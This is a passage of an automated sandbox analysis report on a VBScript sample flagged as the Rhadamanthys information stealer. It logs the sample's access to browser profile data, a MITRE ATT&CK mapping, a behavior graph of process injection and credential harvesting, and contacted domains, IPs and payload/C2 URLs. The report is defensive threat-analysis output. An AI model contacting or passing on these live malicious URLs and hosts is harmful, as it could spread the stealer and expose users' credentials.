                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\startupCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-releaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsing\google4Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\mainJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsingJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settingsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browser\newtabJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\doomedJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\thumbnailsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browserJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\entriesJump to behavior
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\BWDRWEEARIJump to behavior
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
                        Source: Yara matchFile source: 0000000E.00000003.2172788749.0000024F6AAC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000003.2195173707.0000024F6AACB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000003.2194338542.0000024F6AACA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000003.2194235697.0000024F6AACC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000003.2193874788.0000024F6AACC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 0000000D.00000003.1943543611.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.1940336602.0000000000130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2033441930.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.1955237609.00000000232F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526259B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,14_3_00007DF4526259B0
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 21_2_000002075879D004 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,21_2_000002075879D004

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information221
                        Scripting                        		Valid Accounts111
                        Windows Management Instrumentation                        		221
                        Scripting                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        OS Credential Dumping                        		13
                        File and Directory Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		1
                        Extra Window Memory Injection                        		3
                        Obfuscated Files or Information                        		21
                        Input Capture                        		224
                        System Information Discovery                        		Remote Desktop Protocol11
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		1
                        Create Account                        		512
                        Process Injection                        		2
                        Software Packing                        		Security Account Manager231
                        Security Software Discovery                        		SMB/Windows Admin Shares21
                        Input Capture                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts3
                        PowerShell                        		Login HookLogin Hook1
                        DLL Side-Loading                        		NTDS151
                        Virtualization/Sandbox Evasion                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Extra Window Memory Injection                        		LSA Secrets2
                        Process Discovery                        		SSHKeylogging3
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                        Masquerading                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                        Virtualization/Sandbox Evasion                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
                        Process Injection                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568996 Sample: ab.vbs Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 57 www.tdejb.com 2->57 59 ts1.aco.net 2->59 61 9 other IPs or domains 2->61 79 Suricata IDS alerts for network traffic 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 Yara detected RHADAMANTHYS Stealer 2->83 85 7 other signatures 2->85 11 powershell.exe 18 2->11         started        14 wscript.exe 1 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 99 Early bird code injection technique detected 11->99 101 Writes to foreign memory regions 11->101 103 Found suspicious powershell code related to unpacking or dynamic code loading 11->103 105 Queues an APC in another process (thread injection) 11->105 19 msiexec.exe 1 6 11->19         started        23 conhost.exe 11->23         started        107 VBScript performs obfuscated calls to suspicious functions 14->107 109 Suspicious powershell command line found 14->109 111 Wscript starts Powershell (via cmd or directly) 14->111 113 3 other signatures 14->113 25 powershell.exe 14 18 14->25         started        27 WMIC.exe 1 14->27         started        55 127.0.0.1 unknown unknown 16->55 signatures6 process7 dnsIp8 67 tdejb.com 202.71.109.228, 443, 49831 TMVADS-APTM-VADSDCHostingMY Malaysia 19->67 87 Switches to a custom stack to bypass stack traces 19->87 29 svchost.exe 19->29         started        69 pts.group 68.66.226.116, 443, 49730 A2HOSTINGUS United States 25->69 89 Found suspicious powershell code related to unpacking or dynamic code loading 25->89 33 conhost.exe 25->33         started        91 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 27->91 35 conhost.exe 27->35         started        signatures9 process10 dnsIp11 77 45.149.241.141, 2023, 443, 49852 UUNETUS Germany 29->77 115 System process connects to network (likely due to code injection or exploit) 29->115 117 Switches to a custom stack to bypass stack traces 29->117 37 svchost.exe 6 29->37         started        signatures12 process13 dnsIp14 71 ntp.nict.jp 61.205.120.130, 123, 60668 OPTAGEOPTAGEIncJP Japan 37->71 73 gbg1.ntp.netnod.se 194.58.203.20, 123, 60668 NTP-SEAnycastedNTPservicesfromNetnodIXPsSE Sweden 37->73 75 3 other IPs or domains 37->75 93 Tries to harvest and steal browser information (history, passwords, etc) 37->93 41 wmplayer.exe 37->41         started        44 msedge.exe 5 199 37->44         started        46 chrome.exe 37->46         started        signatures15 process16 signatures17 95 Writes to foreign memory regions 41->95 97 Allocates memory in foreign processes 41->97 48 dllhost.exe 41->48         started        50 msedge.exe 44->50         started        53 chrome.exe 46->53         started        process18 dnsIp19 63 162.159.61.3, 443, 49930 CLOUDFLARENETUS United States 50->63 65 chrome.cloudflare-dns.com 172.64.41.3, 443, 49931 CLOUDFLARENETUS United States 50->65

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        ab.vbs0%ReversingLabs

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22gl0%Avira URL Cloudsafe
                        https://pts.group/ab/Laney.dsp0%Avira URL Cloudsafe
                        https://go.micro0%Avira URL Cloudsafe
                        https://www.puneet.ae/ab/Laney.dsp0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.bin0%Avira URL Cloudsafe
                        http://pts.group0%Avira URL Cloudsafe
                        https://pts.group0%Avira URL Cloudsafe
                        https://www.tdejb.com/0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        time.cloudflare.com
                        		162.159.200.1
                        		truefalse
                          		high
                          ntp.nict.jp
                          		61.205.120.130
                          		truefalse
                            		high
                            chrome.cloudflare-dns.com
                            		172.64.41.3
                            		truefalse
                              		high
                              gbg1.ntp.netnod.se
                              		194.58.203.20
                              		truefalse
                                		unknown
                                pts.group
                                		68.66.226.116
                                		truefalse
                                  		unknown
                                  tdejb.com
                                  		202.71.109.228
                                  		truefalse
                                    		unknown
                                    ntp.time.in.ua
                                    		62.149.0.30
                                    		truefalse
                                      		high
                                      ntp1.hetzner.de
                                      		213.239.239.164
                                      		truefalse
                                        		unknown
                                        time.facebook.com
                                        		129.134.25.123
                                        		truefalse
                                          		high
                                          gbg1.ntp.se
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            ts1.aco.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.tdejb.com
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                https://pts.group/ab/Laney.dspfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.tdejb.com/ab/ab.binfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1555228381.0000021D90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1773360781.0000000005F38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glsvchost.exefalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.puneet.ae/ab/Laney.dsppowershell.exe, 00000004.00000002.1532725380.0000021D80225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1532725380.0000021D81333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1749523122.0000000005025000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1749523122.0000000005025000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aka.ms/pscore6lBpowershell.exe, 00000007.00000002.1749523122.0000000004ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1749523122.0000000005025000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://go.micropowershell.exe, 00000004.00000002.1532725380.0000021D81333000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://contoso.com/powershell.exe, 00000007.00000002.1773360781.0000000005F38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1555228381.0000021D90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1773360781.0000000005F38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.microsoft.copowershell.exe, 00000007.00000002.1781112542.0000000007998000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/Licensepowershell.exe, 00000007.00000002.1773360781.0000000005F38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/Iconpowershell.exe, 00000007.00000002.1773360781.0000000005F38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.tdejb.com/msiexec.exe, 00000009.00000002.1959171271.0000000000642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://pts.grouppowershell.exe, 00000004.00000002.1532725380.0000021D81C68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://aka.ms/pscore68powershell.exe, 00000004.00000002.1532725380.0000021D80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1532725380.0000021D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1749523122.0000000004ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://pts.grouppowershell.exe, 00000004.00000002.1532725380.0000021D80225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1532725380.0000021D81333000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.1749523122.0000000005025000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        162.159.200.1
                                                                        		time.cloudflare.comUnited States
                                                                        		13335CLOUDFLARENETUSfalse
                                                                        194.58.203.20
                                                                        		gbg1.ntp.netnod.seSweden
                                                                        		57021NTP-SEAnycastedNTPservicesfromNetnodIXPsSEfalse
                                                                        213.239.239.164
                                                                        		ntp1.hetzner.deGermany
                                                                        		24940HETZNER-ASDEfalse
                                                                        62.149.0.30
                                                                        		ntp.time.in.uaUkraine
                                                                        		15497COLOCALLInternetDataCenterColoCALLUAfalse
                                                                        68.66.226.116
                                                                        		pts.groupUnited States
                                                                        		55293A2HOSTINGUSfalse
                                                                        162.159.61.3
                                                                        		unknownUnited States
                                                                        		13335CLOUDFLARENETUSfalse
                                                                        45.149.241.141
                                                                        		unknownGermany
                                                                        		701UUNETUStrue
                                                                        61.205.120.130
                                                                        		ntp.nict.jpJapan17511OPTAGEOPTAGEIncJPfalse
                                                                        202.71.109.228
                                                                        		tdejb.comMalaysia
                                                                        		17971TMVADS-APTM-VADSDCHostingMYfalse
                                                                        172.64.41.3
                                                                        		chrome.cloudflare-dns.comUnited States
                                                                        		13335CLOUDFLARENETUSfalse

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1568996
                                                                        Start date and time:2024-12-05 10:37:11 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 10m 47s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:24
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:ab.vbs
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.expl.evad.winVBS@44/120@13/11
                                                                        EGA Information:
                                                                        • Successful, ratio: 33.3%
                                                                        HCA Information:
                                                                        • Successful, ratio: 63%
                                                                        • Number of executed functions: 191
                                                                        • Number of non-executed functions: 19
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .vbs

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.17.46, 64.233.161.84, 13.107.42.16, 13.107.21.239, 204.79.197.239, 172.217.19.238, 13.107.6.158, 23.218.208.109
                                                                        • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, clientservices.googleapis.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, l-0007.l-msedge.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, ctldl.windowsupdate.com, b-0005.b-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.microsoft.com, l-0007.config.skype.com, business.bing.com, clients.l.google.com, dual-a-0036.a-msedge.net
                                                                        • Execution Graph export aborted for target msiexec.exe, PID 6920 because there are no executed function
                                                                        • Execution Graph export aborted for target powershell.exe, PID 7696 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 8060 because it is empty
                                                                        • Execution Graph export aborted for target svchost.exe, PID 1448 because there are no executed function
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
